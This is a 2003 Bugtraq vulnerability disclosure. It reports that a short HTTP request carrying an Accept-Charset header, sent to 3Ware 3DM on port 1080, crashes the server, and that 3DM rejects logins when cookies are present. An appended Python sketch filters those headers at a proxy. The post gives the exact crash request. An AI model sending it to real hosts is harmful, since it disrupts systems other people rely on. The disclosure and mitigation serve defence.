Bugtraq mailing list archives

3Ware 3DM denial of service attack


From: "Neulinger, Nathan" <nneul () umr edu>
Date: Thu, 30 Jan 2003 09:57:37 -0600

I've reported this to 3ware at least twice, and never received any
response. Previously I didn't have a test case other than "run a nessus
scan against the host". I've narrowed it down to a reproducible minimum
test case now.

If you connect to 3dm port 1080 on either Linux or Windows and send:

GET / HTTP/1.1
Host: foo
Accept-Charset: bar

3dm server will terminate immediately.


Other 3dm problems - it flips out and refuses to accept a login if you
have ANY cookies sent. This screws you over if you have a sitewide
.domain.edu cookie for example. 

-- Nathan

------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul () umr edu
University of Missouri - Rolla         Phone: (573) 341-4841
Computing Services                       Fax: (573) 341-4216
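
A mitigation sketch for the two problems reported above, as an added example that is not part of the original post or of 3ware's software: a header filter that a reverse proxy in front of 3DM could apply to each request head before relaying it. The function name is hypothetical, and it is an assumption (not confirmed by the post) that removing the `Accept-Charset` and `Cookie` headers avoids the termination and the login refusal.

```python
# Added example: sanitise one HTTP/1.x request head before relaying it to 3DM.
# Assumption: dropping the two headers the post names avoids both failures.
DROP_HEADERS = {"accept-charset", "cookie"}


def sanitize_request_head(raw: bytes, drop=DROP_HEADERS):
    """Return (clean_bytes, removed_names); raise ValueError to fail closed."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head (no CRLF CRLF)")
    lines = head.split(b"\r\n")
    if not lines[0] or b"\n" in lines[0] or b"\r" in lines[0]:
        raise ValueError("empty request line or bare CR/LF in it")
    kept, removed = [lines[0]], []
    for line in lines[1:]:
        # A bare LF or CR could hide a second header inside one "line".
        if b"\n" in line or b"\r" in line:
            raise ValueError("bare CR/LF inside header line")
        # Folded (continuation) lines could extend a header we meant to drop.
        if line[:1] in (b" ", b"\t"):
            raise ValueError("folded header line")
        name, colon, _value = line.partition(b":")
        if not colon or not name.strip():
            raise ValueError("malformed header line")
        if name.strip().lower().decode("latin-1") in drop:
            removed.append(name.strip().decode("latin-1"))
            continue
        kept.append(line)
    # Anything after the blank line (a request body) is passed through as-is.
    return b"\r\n".join(kept) + b"\r\n\r\n" + rest, removed


if __name__ == "__main__":
    # The request from the post, with CRLF line endings (constructed bytes).
    sample = b"GET / HTTP/1.1\r\nHost: foo\r\nAccept-Charset: bar\r\n\r\n"
    clean, removed = sanitize_request_head(sample)
    print(removed)
    print(clean.decode("latin-1"))
```

Requests that raise `ValueError` should be rejected by the proxy rather than forwarded, so a header hidden behind a bare line feed or a folded line never reaches 3DM.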

